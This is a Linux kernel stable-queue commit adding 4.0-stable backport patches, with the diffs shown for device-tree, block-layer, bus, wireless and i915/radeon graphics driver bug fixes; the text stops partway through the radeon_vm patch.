From: Greg Kroah-Hartman Date: Fri, 19 Jun 2015 19:30:21 +0000 (-0700) Subject: 4.0-stable patches X-Git-Tag: v3.10.81~8 X-Git-Url: http://git.ipfire.org/?a=commitdiff_plain;h=28439ba4f3b17e56b7ab9d3660e978f9850a3cab;p=thirdparty%2Fkernel%2Fstable-queue.git 4.0-stable patches added patches: arm-dts-am335x-boneblack-disable-rtc-only-sleep-to-avoid-hardware-damage.patch arm64-dts-mt8173-evb-fix-model-name.patch ata-ahci_mvebu-fix-wrongly-set-base-address-for-the-mbus-window-setting.patch blk-mq-free-hctx-ctxs-in-queue-s-release-handler.patch bus-mvebu-mbus-do-not-set-win_ctrl_syncbarrier-on-non-io-coherent-platforms.patch cfg80211-wext-clear-sinfo-struct-before-calling-driver.patch drm-amdkfd-fix-topology-bug-with-capability-attr.patch drm-i915-don-t-skip-request-retirement-if-the-active-list-is-empty.patch drm-i915-fix-ddc-probe-for-passive-adapters.patch drm-i915-hsw-fix-workaround-for-server-aux-channel-clock-divisor.patch drm-radeon-fix-freeze-for-laptop-with-turks-thames-gpu.patch drm-radeon-make-sure-radeon_vm_bo_set_addr-always-unreserves-the-bo.patch drm-radeon-use-proper-acr-regisiter-for-dce3.2.patch irqchip-sunxi-nmi-fix-off-by-one-error-in-irq-iterator.patch md-close-race-when-setting-action-to-idle.patch md-don-t-return-0-from-array_state_store.patch mips-fix-enabling-of-debug_stackoverflow.patch mips-kvm-do-not-sign-extend-on-unsigned-mmio-load.patch mips-ralink-fix-clearing-the-illegal-access-interrupt.patch mm-memory_hotplug.c-set-zone-wait_table-to-null-after-freeing-it.patch of-dynamic-fix-test-for-ppc_pseries.patch ozwpan-divide-by-zero-leading-to-panic.patch ozwpan-unchecked-signed-subtraction-leads-to-dos.patch ozwpan-use-proper-check-to-prevent-heap-overflow.patch ozwpan-use-unsigned-ints-to-prevent-heap-overflow.patch pata_octeon_cf-fix-broken-build.patch revert-bus-mvebu-mbus-make-sure-sdram-cs-for-dma-don-t-overlap-the-mbus-bridge-window.patch revert-drm-radeon-adjust-pll-when-audio-is-not-enabled.patch revert-drm-radeon-don-t-share-plls-if-monitors-differ-in-audio-support.patch ring-buffer-benchmark-fix-the-wrong-sched_priority-of-producer.patch sched-numa-do-not-hint-for-numa-balancing-on-vm_mixedmap-mappings.patch serial-imx-fix-dma-handling-for-idle-condition-aborts.patch virtio_pci-clear-stale-cpumask-when-setting-irq-affinity.patch --- diff --git a/queue-4.0/arm-dts-am335x-boneblack-disable-rtc-only-sleep-to-avoid-hardware-damage.patch b/queue-4.0/arm-dts-am335x-boneblack-disable-rtc-only-sleep-to-avoid-hardware-damage.patch new file mode 100644 index 00000000000..70dbafe2154 --- /dev/null +++ b/queue-4.0/arm-dts-am335x-boneblack-disable-rtc-only-sleep-to-avoid-hardware-damage.patch @@ -0,0 +1,60 @@ +From 7a6cb0abe1aa63334f3ded6d2b6c8eca80e72302 Mon Sep 17 00:00:00 2001 +From: Matthijs van Duin +Date: Mon, 1 Jun 2015 21:33:28 +0200 +Subject: ARM: dts: am335x-boneblack: disable RTC-only sleep to avoid hardware damage + +From: Matthijs van Duin + +commit 7a6cb0abe1aa63334f3ded6d2b6c8eca80e72302 upstream. + +Avoid entering "RTC-only mode" at poweroff. It is unsupported by most +versions of BeagleBone, and risks hardware damage. + +The damaging configuration is having system-power-controller +without ti,pmic-shutdown-controller. + +Reported-by: Matthijs van Duin +Tested-by: Matthijs van Duin +Signed-off-by: Robert Nelson +Cc: Tony Lindgren +Cc: Felipe Balbi +Cc: Johan Hovold +[Matthijs van Duin: added explanatory comments] +Signed-off-by: Matthijs van Duin +Fixes: http://bugs.elinux.org/issues/143 +[tony@atomide.com: updated comments with the hardware breaking info] +Signed-off-by: Tony Lindgren +Signed-off-by: Greg Kroah-Hartman + +--- + arch/arm/boot/dts/am335x-bone-common.dtsi | 19 +++++++++++++++++++ + 1 file changed, 19 insertions(+) + +--- a/arch/arm/boot/dts/am335x-bone-common.dtsi ++++ b/arch/arm/boot/dts/am335x-bone-common.dtsi +@@ -223,6 +223,25 @@ + /include/ "tps65217.dtsi" + + &tps { ++ /* ++ * Configure pmic to enter OFF-state instead of SLEEP-state ("RTC-only ++ * mode") at poweroff. Most BeagleBone versions do not support RTC-only ++ * mode and risk hardware damage if this mode is entered. ++ * ++ * For details, see linux-omap mailing list May 2015 thread ++ * [PATCH] ARM: dts: am335x-bone* enable pmic-shutdown-controller ++ * In particular, messages: ++ * http://www.spinics.net/lists/linux-omap/msg118585.html ++ * http://www.spinics.net/lists/linux-omap/msg118615.html ++ * ++ * You can override this later with ++ * &tps { /delete-property/ ti,pmic-shutdown-controller; } ++ * if you want to use RTC-only mode and made sure you are not affected ++ * by the hardware problems. (Tip: double-check by performing a current ++ * measurement after shutdown: it should be less than 1 mA.) ++ */ ++ ti,pmic-shutdown-controller; ++ + regulators { + dcdc1_reg: regulator@0 { + regulator-name = "vdds_dpr"; diff --git a/queue-4.0/arm64-dts-mt8173-evb-fix-model-name.patch b/queue-4.0/arm64-dts-mt8173-evb-fix-model-name.patch new file mode 100644 index 00000000000..d2dace5c590 --- /dev/null +++ b/queue-4.0/arm64-dts-mt8173-evb-fix-model-name.patch @@ -0,0 +1,33 @@ +From 692ef3ee36833b6098a352c079d3cea8fc6ed3ef Mon Sep 17 00:00:00 2001 +From: Yingjoe Chen +Date: Fri, 15 May 2015 23:13:16 +0800 +Subject: arm64: dts: mt8173-evb: fix model name + +From: Yingjoe Chen + +commit 692ef3ee36833b6098a352c079d3cea8fc6ed3ef upstream. + +Model name in mt8173-evb.dts doesn't follow dts convention (it should +be human readable model name). Fix it. + +Fixes: b3a372484157 ("arm64: dts: Add mediatek MT8173 SoC and evaluation board dts and Makefile") +Signed-off-by: Yingjoe Chen +Signed-off-by: Matthias Brugger +Signed-off-by: Greg Kroah-Hartman + +--- + arch/arm64/boot/dts/mediatek/mt8173-evb.dts | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +--- a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts ++++ b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts +@@ -16,7 +16,8 @@ + #include "mt8173.dtsi" + + / { +- model = "mediatek,mt8173-evb"; ++ model = "MediaTek MT8173 evaluation board"; ++ compatible = "mediatek,mt8173-evb", "mediatek,mt8173"; + + aliases { + serial0 = &uart0; diff --git a/queue-4.0/ata-ahci_mvebu-fix-wrongly-set-base-address-for-the-mbus-window-setting.patch b/queue-4.0/ata-ahci_mvebu-fix-wrongly-set-base-address-for-the-mbus-window-setting.patch new file mode 100644 index 00000000000..7f6ab0300c4 --- /dev/null +++ b/queue-4.0/ata-ahci_mvebu-fix-wrongly-set-base-address-for-the-mbus-window-setting.patch @@ -0,0 +1,44 @@ +From e96998fc200867f005dd14c7d1dd35e1107d4914 Mon Sep 17 00:00:00 2001 +From: Nadav Haklai +Date: Tue, 26 May 2015 18:47:23 +0200 +Subject: ata: ahci_mvebu: Fix wrongly set base address for the MBus window setting + +From: Nadav Haklai + +commit e96998fc200867f005dd14c7d1dd35e1107d4914 upstream. + +According to the Armada 38x datasheet, the window base address +registers value is set in bits [31:4] of the register and corresponds +to the transaction address bits [47:20]. + +Therefore, the 32bit base address value should be shifted right by +20bits and left by 4bits, resulting in 16 bit shift right. + +The bug as not been noticed yet because if the memory available on +the platform is less than 2GB, then the base address is zero. + +[gregory.clement@free-electrons.com: add extra-explanation] + +Fixes: a3464ed2f14 (ata: ahci_mvebu: new driver for Marvell Armada 380 +AHCI interfaces) +Signed-off-by: Nadav Haklai +Reviewed-by: Omri Itach +Signed-off-by: Gregory CLEMENT +Signed-off-by: Tejun Heo +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/ata/ahci_mvebu.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +--- a/drivers/ata/ahci_mvebu.c ++++ b/drivers/ata/ahci_mvebu.c +@@ -45,7 +45,7 @@ static void ahci_mvebu_mbus_config(struc + writel((cs->mbus_attr << 8) | + (dram->mbus_dram_target_id << 4) | 1, + hpriv->mmio + AHCI_WINDOW_CTRL(i)); +- writel(cs->base, hpriv->mmio + AHCI_WINDOW_BASE(i)); ++ writel(cs->base >> 16, hpriv->mmio + AHCI_WINDOW_BASE(i)); + writel(((cs->size - 1) & 0xffff0000), + hpriv->mmio + AHCI_WINDOW_SIZE(i)); + } diff --git a/queue-4.0/blk-mq-free-hctx-ctxs-in-queue-s-release-handler.patch b/queue-4.0/blk-mq-free-hctx-ctxs-in-queue-s-release-handler.patch new file mode 100644 index 00000000000..6e937daedd8 --- /dev/null +++ b/queue-4.0/blk-mq-free-hctx-ctxs-in-queue-s-release-handler.patch @@ -0,0 +1,63 @@ +From c3b4afca7023b5aa0531912364246e67f79b3010 Mon Sep 17 00:00:00 2001 +From: Ming Lei +Date: Thu, 4 Jun 2015 22:25:04 +0800 +Subject: blk-mq: free hctx->ctxs in queue's release handler + +From: Ming Lei + +commit c3b4afca7023b5aa0531912364246e67f79b3010 upstream. + +Now blk_cleanup_queue() can be called before calling +del_gendisk()[1], inside which hctx->ctxs is touched +from blk_mq_unregister_hctx(), but the variable has +been freed by blk_cleanup_queue() at that time. + +So this patch moves freeing of hctx->ctxs into queue's +release handler for fixing the oops reported by Stefan. + +[1], 6cd18e711dd8075 (block: destroy bdi before blockdev is +unregistered) + +Reported-by: Stefan Seyfried +Cc: NeilBrown +Cc: Christoph Hellwig +Signed-off-by: Ming Lei +Signed-off-by: Jens Axboe +Signed-off-by: Greg Kroah-Hartman + +--- + block/blk-mq.c | 8 ++++++-- + 1 file changed, 6 insertions(+), 2 deletions(-) + +--- a/block/blk-mq.c ++++ b/block/blk-mq.c +@@ -1589,6 +1589,7 @@ static int blk_mq_hctx_notify(void *data + return NOTIFY_OK; + } + ++/* hctx->ctxs will be freed in queue's release handler */ + static void blk_mq_exit_hctx(struct request_queue *q, + struct blk_mq_tag_set *set, + struct blk_mq_hw_ctx *hctx, unsigned int hctx_idx) +@@ -1607,7 +1608,6 @@ static void blk_mq_exit_hctx(struct requ + + blk_mq_unregister_cpu_notifier(&hctx->cpu_notifier); + blk_free_flush_queue(hctx->fq); +- kfree(hctx->ctxs); + blk_mq_free_bitmap(&hctx->ctx_map); + } + +@@ -1873,8 +1873,12 @@ void blk_mq_release(struct request_queue + unsigned int i; + + /* hctx kobj stays in hctx */ +- queue_for_each_hw_ctx(q, hctx, i) ++ queue_for_each_hw_ctx(q, hctx, i) { ++ if (!hctx) ++ continue; ++ kfree(hctx->ctxs); + kfree(hctx); ++ } + + kfree(q->queue_hw_ctx); + diff --git a/queue-4.0/bus-mvebu-mbus-do-not-set-win_ctrl_syncbarrier-on-non-io-coherent-platforms.patch b/queue-4.0/bus-mvebu-mbus-do-not-set-win_ctrl_syncbarrier-on-non-io-coherent-platforms.patch new file mode 100644 index 00000000000..f177c26d44a --- /dev/null +++ b/queue-4.0/bus-mvebu-mbus-do-not-set-win_ctrl_syncbarrier-on-non-io-coherent-platforms.patch @@ -0,0 +1,49 @@ +From 8c9e06e64768665503e778088a39ecff3a6f2e0c Mon Sep 17 00:00:00 2001 +From: Nicolas Schichan +Date: Thu, 28 May 2015 10:40:12 +0200 +Subject: bus: mvebu-mbus: do not set WIN_CTRL_SYNCBARRIER on non io-coherent platforms. + +From: Nicolas Schichan + +commit 8c9e06e64768665503e778088a39ecff3a6f2e0c upstream. + +Commit a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O +synchronization barriers") enabled the usage of automatic I/O +synchronization barriers by enabling bit WIN_CTRL_SYNCBARRIER in the +control registers of MBus windows, but on non io-coherent platforms +(orion5x, kirkwood and dove) the WIN_CTRL_SYNCBARRIER bit in +the window control register is either reserved (all windows except 6 +and 7) or enables read-only protection (windows 6 and 7). + +Signed-off-by: Nicolas Schichan +Reviewed-by: Thomas Petazzoni +Fixes: a0b5cd4ac2d6 ("bus: mvebu-mbus: use automatic I/O synchronization barriers") +Signed-off-by: Thomas Petazzoni +Signed-off-by: Gregory CLEMENT +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/bus/mvebu-mbus.c | 4 +++- + 1 file changed, 3 insertions(+), 1 deletion(-) + +--- a/drivers/bus/mvebu-mbus.c ++++ b/drivers/bus/mvebu-mbus.c +@@ -70,6 +70,7 @@ + */ + #define WIN_CTRL_OFF 0x0000 + #define WIN_CTRL_ENABLE BIT(0) ++/* Only on HW I/O coherency capable platforms */ + #define WIN_CTRL_SYNCBARRIER BIT(1) + #define WIN_CTRL_TGT_MASK 0xf0 + #define WIN_CTRL_TGT_SHIFT 4 +@@ -323,8 +324,9 @@ static int mvebu_mbus_setup_window(struc + ctrl = ((size - 1) & WIN_CTRL_SIZE_MASK) | + (attr << WIN_CTRL_ATTR_SHIFT) | + (target << WIN_CTRL_TGT_SHIFT) | +- WIN_CTRL_SYNCBARRIER | + WIN_CTRL_ENABLE; ++ if (mbus->hw_io_coherency) ++ ctrl |= WIN_CTRL_SYNCBARRIER; + + writel(base & WIN_BASE_LOW, addr + WIN_BASE_OFF); + writel(ctrl, addr + WIN_CTRL_OFF); diff --git a/queue-4.0/cfg80211-wext-clear-sinfo-struct-before-calling-driver.patch b/queue-4.0/cfg80211-wext-clear-sinfo-struct-before-calling-driver.patch new file mode 100644 index 00000000000..f2d3bd3dd9d --- /dev/null +++ b/queue-4.0/cfg80211-wext-clear-sinfo-struct-before-calling-driver.patch @@ -0,0 +1,49 @@ +From 9c5a18a31b321f120efda412281bb9f610f84aa0 Mon Sep 17 00:00:00 2001 +From: Johannes Berg +Date: Tue, 9 Jun 2015 21:35:44 +0200 +Subject: cfg80211: wext: clear sinfo struct before calling driver + +From: Johannes Berg + +commit 9c5a18a31b321f120efda412281bb9f610f84aa0 upstream. + +Until recently, mac80211 overwrote all the statistics it could +provide when getting called, but it now relies on the struct +having been zeroed by the caller. This was always the case in +nl80211, but wext used a static struct which could even cause +values from one device leak to another. + +Using a static struct is OK (as even documented in a comment) +since the whole usage of this function and its return value is +always locked under RTNL. Not clearing the struct for calling +the driver has always been wrong though, since drivers were +free to only fill values they could report, so calling this +for one device and then for another would always have leaked +values from one to the other. + +Fix this by initializing the structure in question before the +driver method call. + +This fixes https://bugzilla.kernel.org/show_bug.cgi?id=99691 + +Reported-by: Gerrit Renker +Reported-by: Alexander Kaltsas +Signed-off-by: Johannes Berg +Signed-off-by: David S. Miller +Signed-off-by: Greg Kroah-Hartman + +--- + net/wireless/wext-compat.c | 2 ++ + 1 file changed, 2 insertions(+) + +--- a/net/wireless/wext-compat.c ++++ b/net/wireless/wext-compat.c +@@ -1333,6 +1333,8 @@ static struct iw_statistics *cfg80211_wi + memcpy(bssid, wdev->current_bss->pub.bssid, ETH_ALEN); + wdev_unlock(wdev); + ++ memset(&sinfo, 0, sizeof(sinfo)); ++ + if (rdev_get_station(rdev, dev, bssid, &sinfo)) + return NULL; + diff --git a/queue-4.0/drm-amdkfd-fix-topology-bug-with-capability-attr.patch b/queue-4.0/drm-amdkfd-fix-topology-bug-with-capability-attr.patch new file mode 100644 index 00000000000..09f93f031b8 --- /dev/null +++ b/queue-4.0/drm-amdkfd-fix-topology-bug-with-capability-attr.patch @@ -0,0 +1,40 @@ +From 826f5de84ceb6f96306ce4081b75a0539d8edd00 Mon Sep 17 00:00:00 2001 +From: Alexey Skidanov +Date: Sun, 30 Nov 2014 15:03:51 +0200 +Subject: drm/amdkfd: fix topology bug with capability attr. + +From: Alexey Skidanov + +commit 826f5de84ceb6f96306ce4081b75a0539d8edd00 upstream. + +This patch fixes a bug where the number of watch points +was shown before it was actually calculated + +Signed-off-by: Alexey Skidanov +Signed-off-by: Oded Gabbay +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/amd/amdkfd/kfd_topology.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +--- a/drivers/gpu/drm/amd/amdkfd/kfd_topology.c ++++ b/drivers/gpu/drm/amd/amdkfd/kfd_topology.c +@@ -684,8 +684,6 @@ static ssize_t node_show(struct kobject + dev->node_props.cpu_core_id_base); + sysfs_show_32bit_prop(buffer, "simd_id_base", + dev->node_props.simd_id_base); +- sysfs_show_32bit_prop(buffer, "capability", +- dev->node_props.capability); + sysfs_show_32bit_prop(buffer, "max_waves_per_simd", + dev->node_props.max_waves_per_simd); + sysfs_show_32bit_prop(buffer, "lds_size_in_kb", +@@ -735,6 +733,8 @@ static ssize_t node_show(struct kobject + kfd2kgd->get_fw_version( + dev->gpu->kgd, + KGD_ENGINE_MEC1)); ++ sysfs_show_32bit_prop(buffer, "capability", ++ dev->node_props.capability); + } + + return sysfs_show_32bit_prop(buffer, "max_engine_clk_ccompute", diff --git a/queue-4.0/drm-i915-don-t-skip-request-retirement-if-the-active-list-is-empty.patch b/queue-4.0/drm-i915-don-t-skip-request-retirement-if-the-active-list-is-empty.patch new file mode 100644 index 00000000000..2c86929e70e --- /dev/null +++ b/queue-4.0/drm-i915-don-t-skip-request-retirement-if-the-active-list-is-empty.patch @@ -0,0 +1,44 @@ +From 0aedb1626566efd72b369c01992ee7413c82a0c5 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= +Date: Thu, 28 May 2015 18:32:36 +0300 +Subject: drm/i915: Don't skip request retirement if the active list is empty +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= + +commit 0aedb1626566efd72b369c01992ee7413c82a0c5 upstream. + +Apparently we can have requests even if though the active list is empty, +so do the request retirement regardless of whether there's anything +on the active list. + +The way it happened here is that during suspend intel_ring_idle() +notices the olr hanging around and then proceeds to get rid of it by +adding a request. However since there was nothing on the active lists +i915_gem_retire_requests() didn't clean those up, and so the idle work +never runs, and we leave the GPU "busy" during suspend resulting in a +WARN later. + +Signed-off-by: Ville Syrjälä +Reviewed-by: Chris Wilson +Signed-off-by: Jani Nikula +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/i915/i915_gem.c | 3 --- + 1 file changed, 3 deletions(-) + +--- a/drivers/gpu/drm/i915/i915_gem.c ++++ b/drivers/gpu/drm/i915/i915_gem.c +@@ -2732,9 +2732,6 @@ void i915_gem_reset(struct drm_device *d + void + i915_gem_retire_requests_ring(struct intel_engine_cs *ring) + { +- if (list_empty(&ring->request_list)) +- return; +- + WARN_ON(i915_verify_lists(ring->dev)); + + /* Retire requests first as we use it above for the early return. diff --git a/queue-4.0/drm-i915-fix-ddc-probe-for-passive-adapters.patch b/queue-4.0/drm-i915-fix-ddc-probe-for-passive-adapters.patch new file mode 100644 index 00000000000..5c34f0c50f4 --- /dev/null +++ b/queue-4.0/drm-i915-fix-ddc-probe-for-passive-adapters.patch @@ -0,0 +1,124 @@ +From 3f5f1554ee715639e78d9be87623ee82772537e0 Mon Sep 17 00:00:00 2001 +From: Jani Nikula +Date: Tue, 2 Jun 2015 19:21:15 +0300 +Subject: drm/i915: Fix DDC probe for passive adapters +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +From: Jani Nikula + +commit 3f5f1554ee715639e78d9be87623ee82772537e0 upstream. + +Passive DP->DVI/HDMI dongles on DP++ ports show up to the system as HDMI +devices, as they do not have a sink device in them to respond to any AUX +traffic. When probing these dongles over the DDC, sometimes they will +NAK the first attempt even though the transaction is valid and they +support the DDC protocol. The retry loop inside of +drm_do_probe_ddc_edid() would normally catch this case and try the +transaction again, resulting in success. + +That, however, was thwarted by the fix for [1]: + +commit 9292f37e1f5c79400254dca46f83313488093825 +Author: Eugeni Dodonov +Date: Thu Jan 5 09:34:28 2012 -0200 + + drm: give up on edid retries when i2c bus is not responding + +This added code to exit immediately if the return code from the +i2c_transfer function was -ENXIO in order to reduce the amount of time +spent in waiting for unresponsive or disconnected devices. That was +possible because the underlying i2c bit banging algorithm had retries of +its own (which, of course, were part of the reason for the bug the +commit fixes). + +Since its introduction in + +commit f899fc64cda8569d0529452aafc0da31c042df2e +Author: Chris Wilson +Date: Tue Jul 20 15:44:45 2010 -0700 + + drm/i915: use GMBUS to manage i2c links + +we've been flipping back and forth enabling the GMBUS transfers, but +we've settled since then. The GMBUS implementation does not do any +retries, however, bailing out of the drm_do_probe_ddc_edid() retry loop +on first encounter of -ENXIO. This, combined with Eugeni's commit, broke +the retry on -ENXIO. + +Retry GMBUS once on -ENXIO on first message to mitigate the issues with +passive adapters. + +This patch is based on the work, and commit message, by Todd Previte +. + +[1] https://bugs.freedesktop.org/show_bug.cgi?id=41059 + +v2: Don't retry if using bit banging. + +v3: Move retry within gmbux_xfer, retry only on first message. + +v4: Initialize GMBUS0 on retry (Ville). + +v5: Take index reads into account (Ville). + +Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=85924 +Cc: Todd Previte +Tested-by: Oliver Grafe (v2) +Tested-by: Jim Bride +Reviewed-by: Ville Syrjälä +Signed-off-by: Jani Nikula +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/i915/intel_i2c.c | 20 +++++++++++++++++--- + 1 file changed, 17 insertions(+), 3 deletions(-) + +--- a/drivers/gpu/drm/i915/intel_i2c.c ++++ b/drivers/gpu/drm/i915/intel_i2c.c +@@ -435,7 +435,7 @@ gmbus_xfer(struct i2c_adapter *adapter, + struct intel_gmbus, + adapter); + struct drm_i915_private *dev_priv = bus->dev_priv; +- int i, reg_offset; ++ int i = 0, inc, try = 0, reg_offset; + int ret = 0; + + intel_aux_display_runtime_get(dev_priv); +@@ -448,12 +448,14 @@ gmbus_xfer(struct i2c_adapter *adapter, + + reg_offset = dev_priv->gpio_mmio_base; + ++retry: + I915_WRITE(GMBUS0 + reg_offset, bus->reg0); + +- for (i = 0; i < num; i++) { ++ for (; i < num; i += inc) { ++ inc = 1; + if (gmbus_is_index_read(msgs, i, num)) { + ret = gmbus_xfer_index_read(dev_priv, &msgs[i]); +- i += 1; /* set i to the index of the read xfer */ ++ inc = 2; /* an index read is two msgs */ + } else if (msgs[i].flags & I2C_M_RD) { + ret = gmbus_xfer_read(dev_priv, &msgs[i], 0); + } else { +@@ -525,6 +527,18 @@ clear_err: + adapter->name, msgs[i].addr, + (msgs[i].flags & I2C_M_RD) ? 'r' : 'w', msgs[i].len); + ++ /* ++ * Passive adapters sometimes NAK the first probe. Retry the first ++ * message once on -ENXIO for GMBUS transfers; the bit banging algorithm ++ * has retries internally. See also the retry loop in ++ * drm_do_probe_ddc_edid, which bails out on the first -ENXIO. ++ */ ++ if (ret == -ENXIO && i == 0 && try++ == 0) { ++ DRM_DEBUG_KMS("GMBUS [%s] NAK on first message, retry\n", ++ adapter->name); ++ goto retry; ++ } ++ + goto out; + + timeout: diff --git a/queue-4.0/drm-i915-hsw-fix-workaround-for-server-aux-channel-clock-divisor.patch b/queue-4.0/drm-i915-hsw-fix-workaround-for-server-aux-channel-clock-divisor.patch new file mode 100644 index 00000000000..51fb635d7e9 --- /dev/null +++ b/queue-4.0/drm-i915-hsw-fix-workaround-for-server-aux-channel-clock-divisor.patch @@ -0,0 +1,48 @@ +From e058c945e03a629c99606452a6931f632dd28903 Mon Sep 17 00:00:00 2001 +From: Jim Bride +Date: Wed, 27 May 2015 10:21:48 -0700 +Subject: drm/i915/hsw: Fix workaround for server AUX channel clock divisor + +From: Jim Bride + +commit e058c945e03a629c99606452a6931f632dd28903 upstream. + +According to the HSW b-spec we need to try clock divisors of 63 +and 72, each 3 or more times, when attempting DP AUX channel +communication on a server chipset. This actually wasn't happening +due to a short-circuit that only checked the DP_AUX_CH_CTL_DONE bit +in status rather than checking that the operation was done and +that DP_AUX_CH_CTL_TIME_OUT_ERROR was not set. + +[v2] Implemented alternate solution suggested by Jani Nikula. + +Signed-off-by: Jim Bride +Signed-off-by: Jani Nikula +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/i915/intel_dp.c | 5 ++--- + 1 file changed, 2 insertions(+), 3 deletions(-) + +--- a/drivers/gpu/drm/i915/intel_dp.c ++++ b/drivers/gpu/drm/i915/intel_dp.c +@@ -881,10 +881,8 @@ intel_dp_aux_ch(struct intel_dp *intel_d + DP_AUX_CH_CTL_RECEIVE_ERROR)) + continue; + if (status & DP_AUX_CH_CTL_DONE) +- break; ++ goto done; + } +- if (status & DP_AUX_CH_CTL_DONE) +- break; + } + + if ((status & DP_AUX_CH_CTL_DONE) == 0) { +@@ -893,6 +891,7 @@ intel_dp_aux_ch(struct intel_dp *intel_d + goto out; + } + ++done: + /* Check for timeout or receive error. + * Timeouts occur when the sink is not connected + */ diff --git a/queue-4.0/drm-radeon-fix-freeze-for-laptop-with-turks-thames-gpu.patch b/queue-4.0/drm-radeon-fix-freeze-for-laptop-with-turks-thames-gpu.patch new file mode 100644 index 00000000000..06780e3c16f --- /dev/null +++ b/queue-4.0/drm-radeon-fix-freeze-for-laptop-with-turks-thames-gpu.patch @@ -0,0 +1,52 @@ +From 6dfd197283bffc23a2b046a7f065588de7e1fc1e Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Glisse?= +Date: Fri, 5 Jun 2015 13:33:57 -0400 +Subject: drm/radeon: fix freeze for laptop with Turks/Thames GPU. +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +From: =?UTF-8?q?J=C3=A9r=C3=B4me=20Glisse?= + +commit 6dfd197283bffc23a2b046a7f065588de7e1fc1e upstream. + +Laptop with Turks/Thames GPU will freeze if dpm is enabled. It seems +the SMC engine is relying on some state inside the CP engine. CP needs +to chew at least one packet for it to get in good state for dynamic +power management. + +This patch simply disabled and re-enable DPM after the ring test which +is enough to avoid the freeze. + +Signed-off-by: Jérôme Glisse +Signed-off-by: Alex Deucher +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/radeon/radeon_device.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +--- a/drivers/gpu/drm/radeon/radeon_device.c ++++ b/drivers/gpu/drm/radeon/radeon_device.c +@@ -1458,6 +1458,21 @@ int radeon_device_init(struct radeon_dev + if (r) + DRM_ERROR("ib ring test failed (%d).\n", r); + ++ /* ++ * Turks/Thames GPU will freeze whole laptop if DPM is not restarted ++ * after the CP ring have chew one packet at least. Hence here we stop ++ * and restart DPM after the radeon_ib_ring_tests(). ++ */ ++ if (rdev->pm.dpm_enabled && ++ (rdev->pm.pm_method == PM_METHOD_DPM) && ++ (rdev->family == CHIP_TURKS) && ++ (rdev->flags & RADEON_IS_MOBILITY)) { ++ mutex_lock(&rdev->pm.mutex); ++ radeon_dpm_disable(rdev); ++ radeon_dpm_enable(rdev); ++ mutex_unlock(&rdev->pm.mutex); ++ } ++ + if ((radeon_testing & 1)) { + if (rdev->accel_working) + radeon_test_moves(rdev); diff --git a/queue-4.0/drm-radeon-make-sure-radeon_vm_bo_set_addr-always-unreserves-the-bo.patch b/queue-4.0/drm-radeon-make-sure-radeon_vm_bo_set_addr-always-unreserves-the-bo.patch new file mode 100644 index 00000000000..cf7ca3d2543 --- /dev/null +++ b/queue-4.0/drm-radeon-make-sure-radeon_vm_bo_set_addr-always-unreserves-the-bo.patch @@ -0,0 +1,85 @@ +From ee18e599251ed06bf0c8ade7c434a0de311342ca Mon Sep 17 00:00:00 2001 +From: Michel Dänzer +Date: Thu, 11 Jun 2015 18:38:38 +0900 +Subject: drm/radeon: Make sure radeon_vm_bo_set_addr always unreserves the BO +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +From: Michel Dänzer + +commit ee18e599251ed06bf0c8ade7c434a0de311342ca upstream. + +Some error paths didn't unreserve the BO. This resulted in a deadlock +down the road on the next attempt to reserve the (still reserved) BO. + +Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=90873 +Reviewed-by: Christian König +Signed-off-by: Michel Dänzer +Signed-off-by: Alex Deucher +Signed-off-by: Greg Kroah-Hartman + +--- + drivers/gpu/drm/radeon/radeon_vm.c | 17 ++++++++++++----- + 1 file changed, 12 insertions(+), 5 deletions(-) + +--- a/drivers/gpu/drm/radeon/radeon_vm.c ++++ b/drivers/gpu/drm/radeon/radeon_vm.c +@@ -458,14 +458,16 @@ int radeon_vm_bo_set_addr(struct radeon_ + /* make sure object fit at this offset */ + eoffset = soffset + size; + if (soffset >= eoffset) { +- return -EINVAL; ++ r = -EINVAL; ++ goto error_unreserve; + } + + last_pfn = eoffset / RADEON_GPU_PAGE_SIZE; + if (last_pfn > rdev->vm_manager.max_pfn) { + dev_err(rdev->dev, "va above limit (0x%08X > 0x%08X)\n", + last_pfn, rdev->vm_manager.max_pfn); +- return -EINVAL; ++ r = -EINVAL; ++ goto error_unreserve; + } + + } else { +@@ -486,7 +488,8 @@ int radeon_vm_bo_set_addr(struct radeon_ + "(bo %p 0x%010lx 0x%010lx)\n", bo_va->bo, + soffset, tmp->bo, tmp->it.start, tmp->it.last); + mutex_unlock(&vm->mutex); +- return -EINVAL; ++ r = -EINVAL; ++ goto error_unreserve; + } + } + +@@ -497,7 +500,8 @@ int radeon_vm_bo_set_addr(struct radeon_ + tmp = kzalloc(sizeof(struct radeon_bo_va), GFP_KERNEL); + if (!tmp) { + mutex_unlock(&vm->mutex); +- return -ENOMEM; ++ r = -ENOMEM; ++ goto error_unreserve; + } + tmp->it.start = bo_va->it.start; + tmp->it.last = bo_va->it.last; +@@ -555,7 +559,6 @@ int radeon_vm_bo_set_addr(struct radeon_ + r = radeon_vm_clear_bo(rdev, pt); + if (r) { + radeon_bo_unref(&pt); +- 